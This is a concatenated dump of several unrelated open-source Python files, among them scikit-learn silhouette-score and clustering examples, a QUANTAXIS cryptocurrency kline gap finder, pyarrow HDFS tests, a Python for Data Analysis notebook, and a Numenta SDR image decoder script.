To obtain the values for each sample, use :func:`silhouette_samples`.
The best value is 1 and the worst value is -1. Values near 0 indicate
overlapping clusters. Negative values generally indicate that a sample has
been assigned to the wrong cluster, as a different cluster is more similar.
Read more in the :ref:`User Guide <silhouette_coefficient>`.
Parameters
----------
X : array [n_samples_a, n_samples_a] if metric == "precomputed", or, \
[n_samples_a, n_features] otherwise
Array of pairwise distances between samples, or a feature array.
labels : array, shape = [n_samples]
Predicted labels for each sample.
metric : string, or callable
The metric to use when calculating distance between instances in a
feature array. If metric is a string, it must be one of the options
allowed by :func:`metrics.pairwise.pairwise_distances
<sklearn.metrics.pairwise.pairwise_distances>`. If X is the distance
array itself, use ``metric="precomputed"``.
sample_size : int or None
The size of the sample to use when computing the Silhouette Coefficient
on a random subset of the data.
If ``sample_size is None``, no sampling is used.
random_state : integer or numpy.RandomState, optional
The generator used to randomly select a subset of samples if
``sample_size is not None``. If an integer is given, it fixes the seed.
Defaults to the global numpy random number generator.
`**kwds` : optional keyword parameters
Any further parameters are passed directly to the distance function.
If using a scipy.spatial.distance metric, the parameters are still
metric dependent. See the scipy docs for usage examples.
Returns
-------
silhouette : float
Mean Silhouette Coefficient for all samples.
References
----------
.. [1] `Peter J. Rousseeuw (1987). "Silhouettes: a Graphical Aid to the
Interpretation and Validation of Cluster Analysis". Computational
and Applied Mathematics 20: 53-65.
<http://www.sciencedirect.com/science/article/pii/0377042787901257>`_
.. [2] `Wikipedia entry on the Silhouette Coefficient
<http://en.wikipedia.org/wiki/Silhouette_(clustering)>`_
"""
n_labels = len(np.unique(labels))
n_samples = X.shape[0]
if not 1 < n_labels < n_samples:
raise ValueError("Number of labels is %d. Valid values are 2 "
"to n_samples - 1 (inclusive)" % n_labels)
if sample_size is not None:
random_state = check_random_state(random_state)
indices = random_state.permutation(X.shape[0])[:sample_size]
if metric == "precomputed":
X, labels = X[indices].T[indices].T, labels[indices]
else:
X, labels = X[indices], labels[indices]
return np.mean(silhouette_samples(X, labels, metric=metric, **kwds))
def silhouette_samples(X, labels, metric='euclidean', **kwds):
"""Compute the Silhouette Coefficient for each sample.
The Silhouette Coefficient is a measure of how well samples are clustered
with samples that are similar to themselves. Clustering models with a high
Silhouette Coefficient are said to be dense, where samples in the same
cluster are similar to each other, and well separated, where samples in
different clusters are not very similar to each other.
The Silhouette Coefficient is calculated using the mean intra-cluster
distance (``a``) and the mean nearest-cluster distance (``b``) for each
sample. The Silhouette Coefficient for a sample is ``(b - a) / max(a,
b)``.
Note that Silhouette Coefficent is only defined if number of labels
is 2 <= n_labels <= n_samples - 1.
This function returns the Silhouette Coefficient for each sample.
The best value is 1 and the worst value is -1. Values near 0 indicate
overlapping clusters.
Read more in the :ref:`User Guide <silhouette_coefficient>`.
Parameters
----------
X : array [n_samples_a, n_samples_a] if metric == "precomputed", or, \
[n_samples_a, n_features] otherwise
Array of pairwise distances between samples, or a feature array.
labels : array, shape = [n_samples]
label values for each sample
metric : string, or callable
The metric to use when calculating distance between instances in a
feature array. If metric is a string, it must be one of the options
allowed by :func:`sklearn.metrics.pairwise.pairwise_distances`. If X is
the distance array itself, use "precomputed" as the metric.
`**kwds` : optional keyword parameters
Any further parameters are passed directly to the distance function.
If using a ``scipy.spatial.distance`` metric, the parameters are still
metric dependent. See the scipy docs for usage examples.
Returns
-------
silhouette : array, shape = [n_samples]
Silhouette Coefficient for each samples.
References
----------
.. [1] `Peter J. Rousseeuw (1987). "Silhouettes: a Graphical Aid to the
Interpretation and Validation of Cluster Analysis". Computational
and Applied Mathematics 20: 53-65.
<http://www.sciencedirect.com/science/article/pii/0377042787901257>`_
.. [2] `Wikipedia entry on the Silhouette Coefficient
<http://en.wikipedia.org/wiki/Silhouette_(clustering)>`_
"""
distances = pairwise_distances(X, metric=metric, **kwds)
n = labels.shape[0]
A = np.array([_intra_cluster_distance(distances[i], labels, i)
for i in range(n)])
B = np.array([_nearest_cluster_distance(distances[i], labels, i)
for i in range(n)])
sil_samples = (B - A) / np.maximum(A, B)
return sil_samples
def _intra_cluster_distance(distances_row, labels, i):
"""Calculate the mean intra-cluster distance for sample i.
Parameters
----------
distances_row : array, shape = [n_samples]
Pairwise distance matrix between sample i and each sample.
labels : array, shape = [n_samples]
label values for each sample
i : int
Sample index being calculated. It is excluded from calculation and
used to determine the current label
Returns
-------
a : float
Mean intra-cluster distance for sample i
"""
mask = labels == labels[i]
mask[i] = False
if not np.any(mask):
# cluster of size 1
return 0
a = np.mean(distances_row[mask])
return a
def _nearest_cluster_distance(distances_row, labels, i):
"""Calculate the mean nearest-cluster distance for sample i.
Parameters
----------
distances_row : array, shape = [n_samples]
Pairwise distance matrix between sample i and each sample.
labels : array, shape = [n_samples]
label values for each sample
i : int
Sample index being calculated. It is used to determine the current
label.
Returns
-------
b : float
Mean nearest-cluster distance for sample i
"""
label = labels[i]
b = np.min([np.mean(distances_row[labels == cur_label])
for cur_label in set(labels) if not cur_label == label])
return b
| bsd-3-clause |
RPGOne/Skynet | scikit-learn-c604ac39ad0e5b066d964df3e8f31ba7ebda1e0e/examples/feature_selection/plot_rfe_with_cross_validation.py | 24 | 1384 | """
===================================================
Recursive feature elimination with cross-validation
===================================================
A recursive feature elimination example with automatic tuning of the
number of features selected with cross-validation.
"""
print(__doc__)
from sklearn.svm import SVC
from sklearn.cross_validation import StratifiedKFold
from sklearn.feature_selection import RFECV
from sklearn.datasets import make_classification
# Build a classification task using 3 informative features
X, y = make_classification(n_samples=1000, n_features=25, n_informative=3,
n_redundant=2, n_repeated=0, n_classes=8,
n_clusters_per_class=1, random_state=0)
# Create the RFE object and compute a cross-validated score.
svc = SVC(kernel="linear")
# The "accuracy" scoring is proportional to the number of correct
# classifications
rfecv = RFECV(estimator=svc, step=1, cv=StratifiedKFold(y, 2),
scoring='accuracy')
rfecv.fit(X, y)
print("Optimal number of features : %d" % rfecv.n_features_)
# Plot number of features VS. cross-validation scores
import matplotlib.pyplot as plt
plt.figure()
plt.xlabel("Number of features selected")
plt.ylabel("Cross validation score (nb of correct classifications)")
plt.plot(range(1, len(rfecv.grid_scores_) + 1), rfecv.grid_scores_)
plt.show()
| bsd-3-clause |
yutiansut/QUANTAXIS | QUANTAXIS/QAUtil/QAcrypto.py | 2 | 9250 | from QUANTAXIS.QAUtil import (QASETTING, DATABASE, QA_util_log_info)
from QUANTAXIS.QAUtil.QAParameter import (FREQUENCE)
import pandas as pd
from datetime import datetime
import time
from dateutil.tz import tzutc
import pymongo
from QUANTAXIS.QAUtil.QADate_Adv import (
QA_util_str_to_Unix_timestamp,
QA_util_datetime_to_Unix_timestamp,
QA_util_timestamp_to_str,
QA_util_print_timestamp
)
def QA_util_save_raw_symbols(fetch_symnol_func, exchange):
"""
explanation:
保存获取的代码列表
params:
* fetch_symnol_func->
含义: 获取代码列表的函数对象,注意这是一个函数对象,而不是函数运行的实体
类型: func
参数支持: []
* exchange:
含义: 交易所代码
类型: str
参数支持: []
"""
symbols = fetch_symnol_func()
col = QASETTING.client[exchange].symbols
if col.find().count() == len(symbols):
QA_util_log_info(
"{} SYMBOLS are already existed and no more to update"
.format(exchange)
)
else:
#if ('_id' in symbols):
# # 有时有,必须单独删除
# symbols.drop(
# [
# '_id',
# ],
# axis=1,
# inplace=True
# )
QA_util_log_info(
"Delete the original {} symbols collections".format(exchange)
)
QASETTING.client.exchange.drop_collection("symbols")
QA_util_log_info("Downloading the new symbols")
col.insert_many(symbols)
QA_util_log_info(
"{} Symbols download is done! Thank you man!".format(exchange)
)
return symbols
def QA_util_find_missing_kline(
symbol,
freq,
start_epoch=datetime(2017,
10,
1,
tzinfo=tzutc()),
tzlocalize='Asia/Shanghai'
):
"""
查找24小时不间断的连续交易市场中缺失的 kline 历史数据,生成缺失历史数据时间段
"""
FREQUENCE_PERIOD_TIME = {
FREQUENCE.ONE_MIN: 60,
FREQUENCE.FIVE_MIN: 300,
FREQUENCE.FIFTEEN_MIN: 900,
FREQUENCE.THIRTY_MIN: 1800,
FREQUENCE.SIXTY_MIN: 3600,
FREQUENCE.HOUR: 3600,
FREQUENCE.DAY: 86400,
}
if (freq != FREQUENCE.DAY):
col = DATABASE.cryptocurrency_min
col.create_index(
[
("symbol",
pymongo.ASCENDING),
('time_stamp',
pymongo.ASCENDING),
('date_stamp',
pymongo.ASCENDING)
]
)
col.create_index(
[
("symbol",
pymongo.ASCENDING),
("type",
pymongo.ASCENDING),
('time_stamp',
pymongo.ASCENDING)
],
unique=True
)
col.create_index(
[("type",
pymongo.ASCENDING),
('time_stamp',
pymongo.ASCENDING)]
)
col.create_index([('time_stamp', pymongo.ASCENDING)])
# 查询历史数据
query_id = {"symbol": symbol, 'type': freq}
refcount = col.count_documents(query_id)
_data = []
cursor = col.find(query_id).sort('time_stamp', 1)
for item in cursor:
_data.append(
[
str(item['symbol']),
item['time_stamp'],
item['date'],
item['datetime'],
item['type']
]
)
_data = pd.DataFrame(
_data,
columns=[
'symbol',
'time_stamp',
'date',
'datetime',
'type'
]
)
_data = _data.set_index(pd.DatetimeIndex(_data['datetime']), drop=False)
else:
col = DATABASE.cryptocurrency_day
col.create_index(
[
("symbol",
pymongo.ASCENDING),
("date_stamp",
pymongo.ASCENDING)
],
unique=True
)
# 查询是否新 tick
query_id = {"symbol": symbol}
refcount = col.count_documents(query_id)
cursor = col.find(query_id).sort('time_stamp', 1)
_data = []
for item in cursor:
_data.append(
[
str(item['symbol']),
item['time_stamp'],
item['date'],
item['datetime']
]
)
_data = pd.DataFrame(
_data,
columns=['symbol',
'time_stamp',
'date',
'datetime']
).drop_duplicates()
_data['date'] = pd.to_datetime(_data['date'], utc=False)
_data = _data.set_index(pd.DatetimeIndex(_data['date']), drop=False)
if (freq != FREQUENCE.DAY):
# cryptocurrency_min 中的 Date/Datetime 字段均为北京时间
leak_datetime = pd.date_range(
_data.index.min(),
_data.index.max(),
freq=freq
).difference(_data.index).tz_localize(tzlocalize)
if (int(_data.iloc[0].time_stamp) >
(QA_util_datetime_to_Unix_timestamp() + 120)):
# 出现“未来”时间,一般是默认时区设置错误造成的
raise Exception(
'A unexpected \'Future\' timestamp got, Please check self.missing_data_list_func param \'tzlocalize\' set. More info: {:s}@{:s} at {:s} but current time is {}'
.format(
symbol,
freq,
QA_util_print_timestamp(_data.iloc[0].time_stamp),
QA_util_print_timestamp(
QA_util_datetime_to_Unix_timestamp()
)
)
)
else:
leak_datetime = pd.date_range(
_data.index.min(),
_data.index.max(),
freq='1D'
).difference(_data.index).tz_localize(tzlocalize)
if (int(time.mktime(start_epoch.utctimetuple())) > int(
_data.iloc[0].time_stamp)):
miss_kline = pd.DataFrame(columns=['expected', 'between', 'missing'])
else:
miss_kline = pd.DataFrame(
[
[
int(time.mktime(start_epoch.utctimetuple())),
int(_data.iloc[0].time_stamp),
'{} to {}'.format(start_epoch,
_data.iloc[0].date)
]
],
columns=['expected',
'between',
'missing']
)
expected = None
for x in range(0, len(leak_datetime)):
if (expected is None):
expected = int(leak_datetime[x].timestamp())
if ((expected is not None) and (x > 1) and (int(leak_datetime[x].timestamp()) != int(leak_datetime[x - 1].timestamp() + FREQUENCE_PERIOD_TIME[freq]))) or \
((expected is not None) and (x > 1) and (x == len(leak_datetime) - 1)):
between = int(
leak_datetime[x - 1].timestamp() + FREQUENCE_PERIOD_TIME[freq]
)
miss_kline = miss_kline.append(
{
'expected':
int(expected),
'between':
int(between),
'missing':
'{} to {}'.format(
pd.to_datetime(expected,
unit='s'
).tz_localize('Asia/Shanghai'),
pd.to_datetime(between,
unit='s'
).tz_localize('Asia/Shanghai')
)
},
ignore_index=True
)
expected = int(leak_datetime[x].timestamp())
if (int(_data.iloc[-1].time_stamp) + 1 < int(
QA_util_datetime_to_Unix_timestamp())):
miss_kline = miss_kline.append(
{
'expected':
int(_data.iloc[-1].time_stamp) + 1,
'between':
int(QA_util_datetime_to_Unix_timestamp()),
'missing':
'{} to {}'.format(
int(_data.iloc[0].time_stamp) + 1,
QA_util_datetime_to_Unix_timestamp()
)
},
ignore_index=True
)
miss_kline.sort_values(by='expected', ascending=True, inplace=True)
if (len(miss_kline) > 0):
if (miss_kline.iloc[0].expected > QA_util_datetime_to_Unix_timestamp()) and \
(miss_kline.iloc[0].between > QA_util_datetime_to_Unix_timestamp()):
miss_kline.drop(miss_kline.iloc[0], inplace=True)
return miss_kline.values
if __name__ == '__main__':
print(QA_util_find_missing_kline('btcusdt', FREQUENCE.ONE_MIN))
| mit |
TheNeuralBit/arrow | python/pyarrow/tests/test_hdfs.py | 3 | 6134 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from io import BytesIO
from os.path import join as pjoin
import os
import random
import unittest
import numpy as np
import pandas.util.testing as pdt
import pytest
from pyarrow.compat import guid
from pyarrow.filesystem import HdfsClient
import pyarrow.io as io
import pyarrow as pa
import pyarrow.tests.test_parquet as test_parquet
# ----------------------------------------------------------------------
# HDFS tests
def hdfs_test_client(driver='libhdfs'):
host = os.environ.get('ARROW_HDFS_TEST_HOST', 'localhost')
user = os.environ['ARROW_HDFS_TEST_USER']
try:
port = int(os.environ.get('ARROW_HDFS_TEST_PORT', 20500))
except ValueError:
raise ValueError('Env variable ARROW_HDFS_TEST_PORT was not '
'an integer')
return HdfsClient(host, port, user, driver=driver)
@pytest.mark.hdfs
class HdfsTestCases(object):
def _make_test_file(self, hdfs, test_name, test_path, test_data):
base_path = pjoin(self.tmp_path, test_name)
hdfs.mkdir(base_path)
full_path = pjoin(base_path, test_path)
with hdfs.open(full_path, 'wb') as f:
f.write(test_data)
return full_path
@classmethod
def setUpClass(cls):
cls.check_driver()
cls.hdfs = hdfs_test_client(cls.DRIVER)
cls.tmp_path = '/tmp/pyarrow-test-{0}'.format(random.randint(0, 1000))
cls.hdfs.mkdir(cls.tmp_path)
@classmethod
def tearDownClass(cls):
cls.hdfs.delete(cls.tmp_path, recursive=True)
cls.hdfs.close()
def test_hdfs_close(self):
client = hdfs_test_client()
assert client.is_open
client.close()
assert not client.is_open
with pytest.raises(Exception):
client.ls('/')
def test_hdfs_mkdir(self):
path = pjoin(self.tmp_path, 'test-dir/test-dir')
parent_path = pjoin(self.tmp_path, 'test-dir')
self.hdfs.mkdir(path)
assert self.hdfs.exists(path)
self.hdfs.delete(parent_path, recursive=True)
assert not self.hdfs.exists(path)
def test_hdfs_ls(self):
base_path = pjoin(self.tmp_path, 'ls-test')
self.hdfs.mkdir(base_path)
dir_path = pjoin(base_path, 'a-dir')
f1_path = pjoin(base_path, 'a-file-1')
self.hdfs.mkdir(dir_path)
f = self.hdfs.open(f1_path, 'wb')
f.write('a' * 10)
contents = sorted(self.hdfs.ls(base_path, False))
assert contents == [dir_path, f1_path]
def test_hdfs_download_upload(self):
base_path = pjoin(self.tmp_path, 'upload-test')
data = b'foobarbaz'
buf = BytesIO(data)
buf.seek(0)
self.hdfs.upload(base_path, buf)
out_buf = BytesIO()
self.hdfs.download(base_path, out_buf)
out_buf.seek(0)
assert out_buf.getvalue() == data
def test_hdfs_file_context_manager(self):
path = pjoin(self.tmp_path, 'ctx-manager')
data = b'foo'
with self.hdfs.open(path, 'wb') as f:
f.write(data)
with self.hdfs.open(path, 'rb') as f:
assert f.size() == 3
result = f.read(10)
assert result == data
def test_hdfs_read_whole_file(self):
path = pjoin(self.tmp_path, 'read-whole-file')
data = b'foo' * 1000
with self.hdfs.open(path, 'wb') as f:
f.write(data)
with self.hdfs.open(path, 'rb') as f:
result = f.read()
assert result == data
@test_parquet.parquet
def test_hdfs_read_multiple_parquet_files(self):
import pyarrow.parquet as pq
nfiles = 10
size = 5
tmpdir = pjoin(self.tmp_path, 'multi-parquet-' + guid())
self.hdfs.mkdir(tmpdir)
test_data = []
paths = []
for i in range(nfiles):
df = test_parquet._test_dataframe(size, seed=i)
df['index'] = np.arange(i * size, (i + 1) * size)
# Hack so that we don't have a dtype cast in v1 files
df['uint32'] = df['uint32'].astype(np.int64)
path = pjoin(tmpdir, '{0}.parquet'.format(i))
table = pa.Table.from_pandas(df)
with self.hdfs.open(path, 'wb') as f:
pq.write_table(table, f)
test_data.append(table)
paths.append(path)
result = self.hdfs.read_parquet(tmpdir)
expected = pa.concat_tables(test_data)
pdt.assert_frame_equal(result.to_pandas()
.sort_values(by='index').reset_index(drop=True),
expected.to_pandas())
class TestLibHdfs(HdfsTestCases, unittest.TestCase):
DRIVER = 'libhdfs'
@classmethod
def check_driver(cls):
if not io.have_libhdfs():
pytest.fail('No libhdfs available on system')
def test_hdfs_orphaned_file(self):
hdfs = hdfs_test_client()
file_path = self._make_test_file(hdfs, 'orphaned_file_test', 'fname',
'foobarbaz')
f = hdfs.open(file_path)
hdfs = None
f = None # noqa
class TestLibHdfs3(HdfsTestCases, unittest.TestCase):
DRIVER = 'libhdfs3'
@classmethod
def check_driver(cls):
if not io.have_libhdfs3():
pytest.fail('No libhdfs3 available on system')
| apache-2.0 |
morganwallace/open_data | notebooks/Day_04_A_PfDA.py | 2 | 3708 | # -*- coding: utf-8 -*-
# <nbformat>3.0</nbformat>
# <headingcell level=1>
# How to use Python for Data Analysis (PfDA)
# <markdowncell>
#
# *Reading Assigned a while ago from PfDA*
#
# * read [`PfDA`, Chap 1 Preliminaries](http://proquest.safaribooksonline.com/book/programming/python/9781449323592/1dot-preliminaries/id2664030), especially the installation instructions for EPD Free for your computer platform. I want you to try installing EPD Free (or EPD Academic) before class on Thursday.
# * read [`PfDA`, Chap 3](http://proquest.safaribooksonline.com/book/programming/python/9781449323592/3dot-ipython-an-interactive-computing-and-development-environment/id2545624)
# * skim [`PfDA`, Appendix: Python Language Essentials](http://proquest.safaribooksonline.com/book/programming/python/9781449323592/adot-python-language-essentials/id2819503) -- to help remind yourself of key elements of standard Python
# * skim [`PfDA`, Chap 2 Introductory Examples](http://proquest.safaribooksonline.com/book/programming/python/9781449323592/2dot-introductory-examples/id423077)
# <markdowncell>
# * Github repo for book: [pydata/pydata-book](https://github.com/pydata/pydata-book)
# * [Confirmed Errata | O'Reilly Media Python for Data Analysis](http://www.oreilly.com/catalog/errata.csp?isbn=0636920023784)
# * [Unconfirmed Errata | O'Reilly Media Python for Data Analysis](http://www.oreilly.com/catalog/errataunconfirmed.csp?isbn=0636920023784)
# <markdowncell>
# I suggest cloning the repo somewhere on your computer
#
# my own setup: I've git cloned
#
# https://github.com/pydata/pydata-book.git
#
# into
#
# /Users/raymondyee/D/Document/Working_with_Open_Data/pydata-book/
#
# and put a symbolic link to /Users/raymondyee/D/Document/Working_with_Open_Data/pydata-book/ in my working-with-open-data-2014 repo parallel to the notebooks directory.
# <codecell>
%%bash
# this is what I ran on my mac to make this link
cd ..
ln -s /Users/raymondyee/D/Document/Working_with_Open_Data/pydata-book/ pydata-book
# <codecell>
%%bash
# in my case, I had been adding other notebooks
ls ../pydata-book/
# <headingcell level=1>
# Calculate PFDA_PATH (for RY's relative dir setup) or set it manually
# <codecell>
#http://stackoverflow.com/a/17295128/7782
import os
PFDA_PATH = os.path.abspath(os.path.join(os.getcwd(),
os.path.join(os.path.pardir, "pydata-book")
))
PFDA_PATH
# <codecell>
assert os.path.exists(PFDA_PATH)
# <headingcell level=1>
# Chapter 1
# <codecell>
# locat the bitly file and make sure it exists
import os
path = os.path.join(PFDA_PATH,'ch02/usagov_bitly_data2012-03-16-1331923249.txt')
print "bit.ly data file exists: ", os.path.exists(path)
# <codecell>
# let's try some of the code from PfDA
# read a line
open(path).readline()
# <codecell>
import json
records = [json.loads(line) for line in open(path)]
time_zones = [rec.get('tz') for rec in records]
# <codecell>
time_zones
# <headingcell level=2>
# Jumping to "Counting Time Zones with pandas" (p.21)
# <codecell>
from pandas import DataFrame, Series
import pandas as pd
# <codecell>
frame = DataFrame(records) # records is a list of dicts
# <codecell>
frame['tz'].value_counts()
# <codecell>
# fill missing
clean_tz = frame['tz'].fillna('Missing')
clean_tz.value_counts()
# <codecell>
clean_tz[clean_tz==''] = 'Unknown'
# <codecell>
clean_tz.value_counts()
# <codecell>
# let's embed the plot inline
%pylab --no-import-all inline
# <codecell>
tz_counts = clean_tz.value_counts()
# <codecell>
tz_counts[:10].plot(kind='barh', rot=0)
# <markdowncell>
# And so on....
| apache-2.0 |
numenta/nupic.research | projects/visual_recognition_grid_cells/SDR_decoder.py | 3 | 7700 | # Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2020, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
#
"""
Trains a decoder to reconstruct input images from SDRs
"""
import math
import os
import matplotlib.pyplot as plt
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torchvision import datasets
torch.manual_seed(18)
np.random.seed(18)
DATASET = "mnist"
TRAIN_NEW_NET = True
EPOCHS = 10 # Recommend 10
BATCH_SIZE = 64 # Recommend 64
class MLPDecoder(torch.nn.Module):
def __init__(self):
super(MLPDecoder, self).__init__()
self.dense1 = nn.Linear(in_features=128 * 5 * 5, out_features=512)
self.dense2 = nn.Linear(in_features=512, out_features=28 * 28)
def forward(self, x):
x = F.relu(self.dense1(x))
x = torch.sigmoid(self.dense2(x))
x = x.view(-1, 28, 28)
return x
def initialize():
net = MLPDecoder()
# SDR inputs that the decoder needs to use to reconstruct images
training_input = torch.from_numpy(np.load("python2_htm_docker/docker_dir/training_"
"and_testing_data/" + DATASET
+ "_SDRs_base_net_training.npy"))
testing_input = torch.from_numpy(np.load("python2_htm_docker/docker_dir/training_"
"and_testing_data/" + DATASET
+ "_SDRs_SDR_classifiers_training.npy"))
# The "sources" are the original images that need to be reconstructed
if DATASET == "mnist":
print("Using MNIST data-set")
total_sources = datasets.MNIST(
"data", train=True,
download=True).train_data.float() / 255
testing_sdrc_classifiers_dataset = datasets.MNIST(
"data", train=False,
download=True).train_data.float() / 255
# Note not used by auto-encoder but used to save output images from Torchvision
# for later use by GridCellNet
elif DATASET == "fashion_mnist":
print("Using Fashion-MNIST data-set")
total_sources = datasets.FashionMNIST(
"data", train=True, download=True).train_data.float() / 255
testing_sdrc_classifiers_dataset = datasets.FashionMNIST(
"data", train=False, download=True).train_data.float() / 255
total_len = len(total_sources)
print("Using hold-out cross-validation data-set for evaluating decoder")
indices = range(total_len)
val_split = int(np.floor(0.1 * total_len))
train_idx, test_decoder_idx = indices[val_split:], indices[:val_split]
training_sources = total_sources[train_idx]
testing_decoder_sources = total_sources[test_decoder_idx]
training_labels = torch.from_numpy(
np.load("python2_htm_docker/docker_dir/training_and_testing_data/"
+ DATASET + "_labels_base_net_training.npy"))
testing_labels = torch.from_numpy(
np.load("python2_htm_docker/docker_dir/training_and_testing_data/"
+ DATASET + "_labels_SDR_classifiers_training.npy"))
np.save("python2_htm_docker/docker_dir/training_and_testing_data/" + DATASET
+ "_images_SDR_classifiers_training", testing_decoder_sources)
np.save("python2_htm_docker/docker_dir/training_and_testing_data/" + DATASET
+ "_images_SDR_classifiers_testing", testing_sdrc_classifiers_dataset)
return (net, training_input, testing_input, training_sources,
testing_decoder_sources, training_labels, testing_labels)
def train_net(net, training_input, training_sources, training_labels):
criterion = torch.nn.MSELoss()
optimizer = torch.optim.Adam(net.parameters(), lr=1e-3)
for epoch in range(EPOCHS):
running_loss = 0
for batch_iter in range(math.ceil(len(training_labels) / BATCH_SIZE)):
batch_input = training_input[batch_iter * BATCH_SIZE:min((batch_iter + 1)
* BATCH_SIZE, len(training_labels))]
batch_sources = training_sources[batch_iter * BATCH_SIZE:min((batch_iter
+ 1) * BATCH_SIZE, len(training_labels))]
optimizer.zero_grad()
reconstructed = net(batch_input)
loss = criterion(reconstructed, batch_sources)
loss.backward()
optimizer.step()
running_loss += loss.item()
print("\nEpoch:" + str(epoch))
print("Training loss is " + str(running_loss / len(training_labels)))
print("Saving network state...")
torch.save(net.state_dict(), "saved_networks/" + DATASET + "_decoder.pt")
print("Finished Training")
def generate_images(net, net_input, sources, labels):
net.load_state_dict(torch.load("saved_networks/" + DATASET + "_decoder.pt"))
# Re-construct one batch worth of testing examples and save as images
for batch_iter in range(1):
batch_input = net_input[batch_iter * BATCH_SIZE:min((batch_iter + 1)
* BATCH_SIZE, len(labels))]
batch_sources = sources[batch_iter * BATCH_SIZE:min((batch_iter + 1)
* BATCH_SIZE, len(labels))]
batch_labels = labels[batch_iter * BATCH_SIZE:min((batch_iter + 1)
* BATCH_SIZE, len(labels))]
reconstructed = net(batch_input)
for image_iter in range(len(batch_labels)):
plt.imsave("decoder_reconstructed_images/" + str(batch_iter) + "_"
+ str(image_iter) + "_original_label_"
+ str(batch_labels[image_iter].item()) + ".png",
batch_sources.detach().numpy()[image_iter])
plt.imsave("decoder_reconstructed_images/" + str(batch_iter) + "_"
+ str(image_iter) + "_reconstructed_label_"
+ str(batch_labels[image_iter].item()) + ".png",
reconstructed.detach().numpy()[image_iter])
if __name__ == "__main__":
if os.path.exists("decoder_reconstructed_images/") is False:
try:
os.mkdir("decoder_reconstructed_images/")
except OSError:
pass
(net, training_input, testing_input, training_sources, testing_sources,
training_labels, testing_labels) = initialize()
if TRAIN_NEW_NET is True:
print("Training new network")
train_net(net, training_input, training_sources, training_labels)
print("Generating images from newly trained network using unseen data")
generate_images(net, net_input=testing_input, sources=testing_sources,
labels=testing_labels)
elif TRAIN_NEW_NET is False:
print("Generating images from previously trained network using unseen data")
generate_images(net, net_input=testing_input, sources=testing_sources,
labels=testing_labels)
| agpl-3.0 |
JPFrancoia/scikit-learn | examples/cluster/plot_cluster_comparison.py | 58 | 4681 | """
=========================================================
Comparing different clustering algorithms on toy datasets
=========================================================
This example aims at showing characteristics of different
clustering algorithms on datasets that are "interesting"
but still in 2D. The last dataset is an example of a 'null'
situation for clustering: the data is homogeneous, and
there is no good clustering.
While these examples give some intuition about the algorithms,
this intuition might not apply to very high dimensional data.
The results could be improved by tweaking the parameters for
each clustering strategy, for instance setting the number of
clusters for the methods that needs this parameter
specified. Note that affinity propagation has a tendency to
create many clusters. Thus in this example its two parameters
(damping and per-point preference) were set to mitigate this
behavior.
"""
print(__doc__)
import time
import numpy as np
import matplotlib.pyplot as plt
from sklearn import cluster, datasets
from sklearn.neighbors import kneighbors_graph
from sklearn.preprocessing import StandardScaler
np.random.seed(0)
# Generate datasets. We choose the size big enough to see the scalability
# of the algorithms, but not too big to avoid too long running times
n_samples = 1500
noisy_circles = datasets.make_circles(n_samples=n_samples, factor=.5,
noise=.05)
noisy_moons = datasets.make_moons(n_samples=n_samples, noise=.05)
blobs = datasets.make_blobs(n_samples=n_samples, random_state=8)
no_structure = np.random.rand(n_samples, 2), None
colors = np.array([x for x in 'bgrcmykbgrcmykbgrcmykbgrcmyk'])
colors = np.hstack([colors] * 20)
clustering_names = [
'MiniBatchKMeans', 'AffinityPropagation', 'MeanShift',
'SpectralClustering', 'Ward', 'AgglomerativeClustering',
'DBSCAN', 'Birch']
plt.figure(figsize=(len(clustering_names) * 2 + 3, 9.5))
plt.subplots_adjust(left=.02, right=.98, bottom=.001, top=.96, wspace=.05,
hspace=.01)
plot_num = 1
datasets = [noisy_circles, noisy_moons, blobs, no_structure]
for i_dataset, dataset in enumerate(datasets):
X, y = dataset
# normalize dataset for easier parameter selection
X = StandardScaler().fit_transform(X)
# estimate bandwidth for mean shift
bandwidth = cluster.estimate_bandwidth(X, quantile=0.3)
# connectivity matrix for structured Ward
connectivity = kneighbors_graph(X, n_neighbors=10, include_self=False)
# make connectivity symmetric
connectivity = 0.5 * (connectivity + connectivity.T)
# create clustering estimators
ms = cluster.MeanShift(bandwidth=bandwidth, bin_seeding=True)
two_means = cluster.MiniBatchKMeans(n_clusters=2)
ward = cluster.AgglomerativeClustering(n_clusters=2, linkage='ward',
connectivity=connectivity)
spectral = cluster.SpectralClustering(n_clusters=2,
eigen_solver='arpack',
affinity="nearest_neighbors")
dbscan = cluster.DBSCAN(eps=.2)
affinity_propagation = cluster.AffinityPropagation(damping=.9,
preference=-200)
average_linkage = cluster.AgglomerativeClustering(
linkage="average", affinity="cityblock", n_clusters=2,
connectivity=connectivity)
birch = cluster.Birch(n_clusters=2)
clustering_algorithms = [
two_means, affinity_propagation, ms, spectral, ward, average_linkage,
dbscan, birch]
for name, algorithm in zip(clustering_names, clustering_algorithms):
# predict cluster memberships
t0 = time.time()
algorithm.fit(X)
t1 = time.time()
if hasattr(algorithm, 'labels_'):
y_pred = algorithm.labels_.astype(np.int)
else:
y_pred = algorithm.predict(X)
# plot
plt.subplot(4, len(clustering_algorithms), plot_num)
if i_dataset == 0:
plt.title(name, size=18)
plt.scatter(X[:, 0], X[:, 1], color=colors[y_pred].tolist(), s=10)
if hasattr(algorithm, 'cluster_centers_'):
centers = algorithm.cluster_centers_
center_colors = colors[:len(centers)]
plt.scatter(centers[:, 0], centers[:, 1], s=100, c=center_colors)
plt.xlim(-2, 2)
plt.ylim(-2, 2)
plt.xticks(())
